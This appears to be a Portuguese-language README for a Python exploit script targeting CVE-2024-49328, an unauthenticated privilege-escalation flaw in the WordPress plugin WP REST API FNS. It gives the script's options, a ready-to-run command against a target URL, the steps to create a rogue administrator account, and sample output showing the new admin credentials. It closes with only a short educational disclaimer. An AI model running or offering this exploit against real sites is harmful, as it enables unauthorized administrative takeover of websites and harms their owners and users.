
Script em Python para explorar uma vulnerabilidade de escalonamento de privilégios no plugin WordPress WP REST API FNS, permitindo a criação não autenticada de contas de administrador.
Este script explora uma vulnerabilidade de escalada de privilégios no plugin WP REST API FNS para WordPress. A vulnerabilidade afeta todas as versões até e incluindo 1.0.0, permitindo que atacantes não autenticados obtenham privilégios de administrador.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
Exemplo de comando:
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
| Etapa | Descrição | Ícone |
|---|---|---|
| Etapa 1 | Verifique a versão do plugin. | 📝 |
| Etapa 2 | Verifique se a versão é explorável (1.0.0 ou inferior). | ✅ |
| Etapa 3 | Explore a vulnerabilidade e registre um novo usuário administrador. | 🔒 |
| Etapa 4 | Imprima o resultado com as credenciais do usuário para verificação. | 🎉 |
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 Aviso:
Este script é apenas para fins educacionais. O uso não autorizado deste script contra sistemas sem permissão explícita é ilegal e antiético.